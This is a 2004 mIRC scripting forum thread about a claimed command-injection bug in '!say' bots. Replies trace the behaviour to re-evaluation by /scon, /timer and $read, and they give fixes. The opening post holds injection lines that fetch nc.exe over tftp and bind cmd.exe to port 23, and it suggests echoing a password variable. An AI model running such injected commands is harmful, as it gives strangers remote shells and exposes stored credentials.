Posted By: Grumpy $crlf bug - 10/07/04 04:45 AM
I just found a bug in mIRC on users with !say commands activated.
The bug includes remote execution of commands using $crlf
example if someone has !say script running.
!say something $crlf join #123
and the script will only say something, then execute the /join command after that.

This could be major if someone doesn't have /run locked.
someone could get total control of a pc with two lines
!say test $crlf run tftp -i <ip> get nc.exe
!say test $crlf run nc.exe -l -p 23 -e cmd.exe
voila! you got instant access on port 23!
other bugs include $chr(13)
even get the passwords in your client with !say %passwd or something.

Posted By: ScatMan Re: $crlf bug - 10/07/04 05:02 AM
that is not a bug, $crlf specifies the end of command when the server reads it.
also, your example with the run won't work because it will send run to the server rather than executing it on mIRC
Posted By: Danthemandoo Re: $crlf bug - 10/07/04 06:01 AM
Did a little test...here are the results:

(6:59am) <baddie> !say something $crlf join #123
(6:59am) <averageuser> something $crlf join #123

$crlf is perfectly safe.

Used this script btw:
Code:
on *:text:!say *:#: { 
  msg $chan $2-
}
Posted By: ScatMan Re: $crlf bug - 10/07/04 02:26 PM
yes, also it will join the channel only if you evaluate $($1-,2) which is not recommended
Posted By: MTec89 Re: $crlf bug - 10/07/04 03:09 PM
you shouldn't store your password anyway.
Posted By: qwerty Re: $crlf bug - 10/07/04 03:19 PM
There's no bug here. My guess is that you're using /scon (or /scid), probably to relay messages to a channel on another network. Passing $1- to /scon has the side-effects that you mentioned because /scon re-evaluates the parameters passed to it. Use something like
Code:
var %a = $1-
scon N msg #somechannel % $+ a
or
Code:
scon N
msg #somechannel $1-
scon -r
/timer behaves the same way as /scon (re-evaluates the parameters passed to it each time it fires), so you need to watch out for that too.
Posted By: Grumpy Re: $crlf bug - 14/07/04 01:24 PM
hey, thanks, I never thought this would get this many replies. Anyways, thanks for all the feedback. I worked it out. Actually I was using $read(filename.txt , %linenumber)
cause I allow certain users to add descriptions to stuff with my bot and add it to a text file. I used $replace to add a - to words with $ and %. Anyways, to ScatMan: that's exactly what I ended up finding out after playing with it. So I guess it's not that serious. grin Anyways, thanks for all the feedback again.
Posted By: qwerty Re: $crlf bug - 14/07/04 02:44 PM
Ah, in the case of $read, you can just use the n switch to avoid re-evaluation of the line contents:
Code:
$read(file.txt,n,%linenumber)
$read(file.txt,N) acts as $eval($read(file.txt,n,N),2).

Btw, $(string,N) (mentioned by ScatMan) and $eval(string,N) are equivalent.
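The $read case discussed in the two posts above, as an added example that is not part of the original thread or any poster's script: a description bot that stores user text and reads it back with the n switch, with the evaluating call kept as a comment for comparison. The file name descriptions.txt and the !add and !desc triggers are assumptions made for illustration.

```mirc
; Added example. descriptions.txt, !add and !desc are hypothetical names.

; Store a user-supplied description. $2- is evaluated once here, so text
; such as "$me" or "%passwd" reaches the file as literal characters.
on *:text:!add *:#: {
  write descriptions.txt $2-
  msg $chan Description saved as line $lines(descriptions.txt)
}

; Show a stored description by line number.
on *:text:!desc &:#: {
  ; Accept only a positive number that refers to an existing line.
  if ($2 !isnum 1-) { msg $chan Usage: !desc <line number> | return }
  if ($2 > $lines(descriptions.txt)) { msg $chan No such line | return }

  ; BEFORE: without a switch, $read evaluates the stored line, so a saved
  ; "$me" comes back as the bot's nickname and "%passwd" as that
  ; variable's value.
  ;   msg $chan $read(descriptions.txt,$2)

  ; AFTER: the n switch returns the line as plain text, unevaluated, so
  ; stored identifiers and variables are shown exactly as typed.
  msg $chan $read(descriptions.txt,n,$2)
}
```

With the n switch in place, the stored text does not need $ or % rewritten with $replace before it is saved.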
Posted By: Grumpy Re: $crlf bug - 15/07/04 01:05 PM
ah cool, thanks for the info man!!
I have already edited my bot's script, and patched it the hard way replacing all $'s in the descriptions.
I guess i can put it back on when i finish my bot's next version, grin
© mIRC Discussion Forums